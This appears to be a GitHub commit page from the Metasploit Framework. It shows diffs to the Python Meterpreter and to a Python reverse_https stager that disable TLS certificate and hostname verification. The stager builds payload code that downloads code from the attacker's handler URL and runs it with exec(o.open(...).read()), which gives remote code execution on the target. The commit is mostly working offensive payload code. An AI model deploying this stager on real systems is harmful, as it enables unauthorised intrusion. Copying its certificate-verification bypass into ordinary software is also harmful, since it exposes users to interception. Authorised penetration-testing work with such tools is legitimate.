Skip to content

Commit 10e8cef

Browse files
committed
Pymet dont validate ssl certs for 2.7.9/3.4.3
1 parent a407bc8 commit 10e8cef

File tree

2 files changed

+30
-11
lines changed

2 files changed

+30
-11
lines changed

data/meterpreter/meterpreter.py

Lines changed: 10 additions & 5 deletions
Original file line numberDiff line numberDiff line change
@@ -393,12 +393,17 @@ def debug_print(self, msg):
393393
print(msg)
394394

395395
def driver_init_http(self):
396+
opener_args = []
397+
scheme = HTTP_CONNECTION_URL.split(':', 1)[0]
398+
if scheme == 'https' and ((sys.version_info[0] == 2 and sys.version_info >= (2,7,9)) or sys.version_info >= (3,4,3)):
399+
import ssl
400+
ssl_ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
401+
ssl_ctx.check_hostname=False
402+
ssl_ctx.verify_mode=ssl.CERT_NONE
403+
opener_args.append(urllib.HTTPSHandler(0, ssl_ctx))
396404
if HTTP_PROXY:
397-
scheme = HTTP_CONNECTION_URL.split(':', 1)[0]
398-
proxy_handler = urllib.ProxyHandler({scheme: HTTP_PROXY})
399-
opener = urllib.build_opener(proxy_handler)
400-
else:
401-
opener = urllib.build_opener()
405+
opener_args.append(urllib.ProxyHandler({scheme: HTTP_PROXY}))
406+
opener = urllib.build_opener(*opener_args)
402407
if HTTP_USER_AGENT:
403408
opener.addheaders = [('User-Agent', HTTP_USER_AGENT)]
404409
urllib.install_opener(opener)

modules/payloads/stagers/python/reverse_https.rb

Lines changed: 20 additions & 6 deletions
Original file line numberDiff line numberDiff line change
@@ -8,7 +8,7 @@
88

99
module Metasploit3
1010

11-
CachedSize = 446
11+
CachedSize = 742
1212

1313
include Msf::Payload::Stager
1414

@@ -55,18 +55,32 @@ def generate
5555
proxy_host = datastore['PayloadProxyHost'].to_s
5656
proxy_port = datastore['PayloadProxyPort'].to_i
5757

58-
cmd = "import sys\n"
5958
if proxy_host == ''
60-
cmd << "o=__import__({2:'urllib2',3:'urllib.request'}[sys.version_info[0]],fromlist=['build_opener']).build_opener()\n"
59+
urllib_fromlist = "['HTTPSHandler','build_opener']"
6160
else
61+
urllib_fromlist = "['HTTPSHandler','ProxyHandler','build_opener']"
62+
end
63+
64+
cmd = "import sys\n"
65+
cmd << "vi=sys.version_info\n"
66+
cmd << "ul=__import__({2:'urllib2',3:'urllib.request'}[vi[0]],fromlist=#{urllib_fromlist})\n"
67+
cmd << "hs=[]\n"
68+
# Context added to HTTPSHandler in 2.7.9 and 3.4.3
69+
cmd << "if (vi[0]==2 and vi>=(2,7,9)) or vi>=(3,4,3):\n"
70+
cmd << "\timport ssl\n"
71+
cmd << "\tsc=ssl.SSLContext(ssl.PROTOCOL_SSLv23)\n"
72+
cmd << "\tsc.check_hostname=False\n"
73+
cmd << "\tsc.verify_mode=ssl.CERT_NONE\n"
74+
cmd << "\ths.append(ul.HTTPSHandler(0,sc))\n"
75+
76+
if proxy_host != ''
6277
proxy_url = Rex::Socket.is_ipv6?(proxy_host) ?
6378
"http://[#{proxy_host}]:#{proxy_port}" :
6479
"http://#{proxy_host}:#{proxy_port}"
65-
66-
cmd << "ul=__import__({2:'urllib2',3:'urllib.request'}[sys.version_info[0]],fromlist=['ProxyHandler','build_opener'])\n"
67-
cmd << "o=ul.build_opener(ul.ProxyHandler({'https':'#{var_escape.call(proxy_url)}'}))\n"
80+
cmd << "hs.append(ul.ProxyHandler({'https':'#{var_escape.call(proxy_url)}'}))\n"
6881
end
6982

83+
cmd << "o=ul.build_opener(*hs)\n"
7084
cmd << "o.addheaders=[('User-Agent','#{var_escape.call(datastore['MeterpreterUserAgent'])}')]\n"
7185
cmd << "exec(o.open('#{target_url}').read())\n"
7286

0 commit comments

Comments
 (0)